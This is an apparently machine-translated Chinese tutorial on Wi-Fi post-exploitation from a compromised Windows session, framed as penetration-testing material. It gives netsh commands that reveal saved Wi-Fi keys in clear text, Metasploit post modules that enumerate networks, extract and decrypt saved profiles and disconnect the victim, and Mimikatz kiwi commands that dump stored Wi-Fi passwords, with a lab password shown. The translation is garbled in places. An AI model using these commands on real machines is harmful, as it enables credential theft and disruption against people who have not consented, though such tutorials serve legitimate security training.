大多數Wi-Fi網絡的安全協議經常被破壞或繞過,從而將無線互聯網流量暴露給攻擊者。通過本文,我們可以瞭解獲取遠程用戶Wi-Fi基本服務集信息的不同方法以及當前網絡連接信息,以及如何提取遠程PC的已保存無線局域網配置文件,之後您將斷開目標用戶的Wi-也是。以下所有攻擊都是後期攻擊。
表中的內容
-
介紹
-
使用Wi-Fi
-
Wi-Fi安全類型
-
WLAN BSS列表
-
WLAN當前連接
-
WLAN配置文件
-
WLAN斷開連接
-
Mimikatz
-
Netsh的
介紹
所有無線網絡技術通常稱爲Wi-Fi。它提供高速互聯網,因爲它適用於無線電波。Wi-Fi商標歸Wi-Fi聯盟所有; 它正式定義爲無線局域網(WLAN)。它受到許多應用程序和設備的支持,例如移動電話, PDA ,操作系統,視頻遊戲控制檯等,因此,它可以讓所有設備輕鬆進行通信。
使用Wi-Fi
顧名思義, Wi-Fi 網絡在發送方和接收方之間沒有物理連接。它使用與無線電波相關的電磁頻譜內的射頻。因此,它能夠提供高速互聯網。每個Wi-Fi連接都通過接入點(AP)工作。接入點的主要工作是廣播電子設備進一步檢測到的信號。在檢測到信號時,他們連接到Wi-Fi以使用Wi-Fi。
Wi-Fi安全類型
-
有線等效保密
-
Wi-Fi保護訪問
-
Wi-Fi保護訪問2
Netsh的
現在你有一個受害者PC的會話,轉到shell並使用以下命令找出受害者PC隨時間的Wi-Fi連接;
1 |
netsh wlan show profiles |
如上圖所示,到目前爲止,PC連接到Pentest Lab,Sinos,POCO PHONE,點燃。現在,我們可以使用以下內容獲取有關網絡的詳細信息:
1 |
netsh wlan show networks mode=bssid |
現在,使用以下命令查看特定Wi-Fi的密碼:
1 |
netsh wlan show profile name="ignit" key=clear |
WLAN BSS列表
此模塊收集有關受害計算機可用的無線基本服務集的信息。
例如,這將爲您提供有關無線連接的SSID和其他重要信息。
1 2 3 |
msf > use post/windows/wlan/wlan_bss_list msf post(wlan_bss_list) > set session 5 msf post(wlan_bss_list) > exploit |
從下面給出的圖像你可以看到它在這裏發現了“5個網絡”,如Pen lab,Sinos,Ignite等以及它們的基本3個細節
WLAN當前連接
此模塊收集有關目標計算機上每個無線LAN接口上的當前連接的信息。
1 2 3 |
msf > use post/windows/wlan/wlan_current_connection msf post(wlan_current_connection) > set session 5 msf post(wlan_current_connection) > run |
下面給出的圖像已經公開了“筆實驗室”是受害者連接的當前連接,而且它已經顯示了一些基本細節,例如路由器的MAC地址,安全狀態,認證類型等。
WLAN配置文件
此模塊提取已保存的無線LAN配置文件 它還將嘗試解密網絡密鑰材料。在WPA中,OS版本之間的行爲略有不同。在Windows Vista / 7中,我們將獲得密碼。在Windows XP中,我們將獲得PBKDF2派生的密鑰。
1 2 3 |
msf post> use post/windows/wlan/wlan_profile msf post(wlan_profile) > set session 5 msf post(wlan_profile) > exploit |
從下面給出的圖像中你可以看到它已經提取了受害者連接的wifi配置文件,而且它還解密了共享密鑰(密碼)。因此,您可以確認“Pen Lab”的密碼是“ ignite @ 123 ”。
WLAN斷開連接
此模塊斷開指定接口上的當前無線網絡連接。
1 2 3 |
msf > use post/windows/wlan/wlan_disconnect msf post(wlan_bss_list) > set session 5 msf post(wlan_disconnect) > exploit |
從下面的圖像中,您可以確認它正在斷開受害者與當前無線網絡的連接。
Mimikatz
我將其稱爲後期利用工具包,因爲它具有許多功能,遠遠超出了轉儲純文本密碼的能力。
1 |
meterpreter > load kiwi |
1 |
meterpreter > help |
這將爲您提供包含密碼的整個無線連接列表。瞧!你做對了。
1 2 |
meterpreter > wifi_list meterpreter > wifi_list_shared |
從下面給出的圖像中,您可以確認它已轉儲所有共享密鑰(密碼)並驗證其各自的SSID。
關於作者
Nisha Yadav接受過道德認證和Bug Bounty Hunter培訓。她目前在Hiddenramp擔任安全分析師。